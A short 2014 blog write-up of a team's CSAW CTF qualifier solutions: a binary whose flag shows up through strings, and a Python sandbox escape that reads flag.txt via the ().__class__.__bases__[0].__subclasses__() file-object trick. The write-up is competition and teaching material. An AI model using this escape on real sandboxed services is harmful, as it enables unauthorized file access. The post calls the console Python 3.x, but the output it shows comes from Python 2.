Monday, 22 September 2014

CSAW CTF 2014 Quals write-up

team r00t, we ended scoring 1250. None of the team members worked for more than half a day, and our team is small, containing 3 members. All lazy people :D

Exploitation - 1: bo

This was a simple problem, or we didn't know how to solve in the way it was meant to be.
As usual as soon as we saw a executable follow the usual procedure -

First, file type

> file bo

bo; ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped

Second, look for strings-

> strings bo

When we look at the strings. Oh wait is it the flag. Hell Yeah :D

Welcome to CSAW CTF!

Time to break out IDA Demo and see what's going on inside me.  :]


Exploitation - 2: pybabbies

nc 12345

Connect the server with that particular port, We found python console showing up.
Afterwards we opened the source file 

As we played around with the console
- Found its Python 3.x
- It does not show any returned value.
  workaround: Just print the return value.
- Any error the execution will close the connection.

Time to analyse the source code. All the cool module and functions where banned :'(

Checked if there is already a variable with flag or key etc having the flag. And obviously it wasnt that easy. So, maybe there is a file with flag.txt or key.txt where the flag is and we have to open it.

As I have already read few blog posts about escaping Python sandbox, It was easy.

Playing around with tuple. Ended with an interesting part -

>>> print(().__class__.__bases__[0].__subclasses__()[40])

<type 'file'>

Now its obvious try opening flag.txt key.txt etc

>>> print(().__class__.__bases__[0].__subclasses__()[40]("flag.txt"))

<open file 'flag', mode 'r' at 0x.....>

Wow!!! It worked. Now just go ahead and read the file

Welcome to my Python sandbox! Enter commands below!
>>> print(().__class__.__bases__[0].__subclasses__()[40]('flag.txt').read())


>>> exit

Thanks for reading through the write-up. If any thing wrong or can be added to this post. Please put them in the comments :)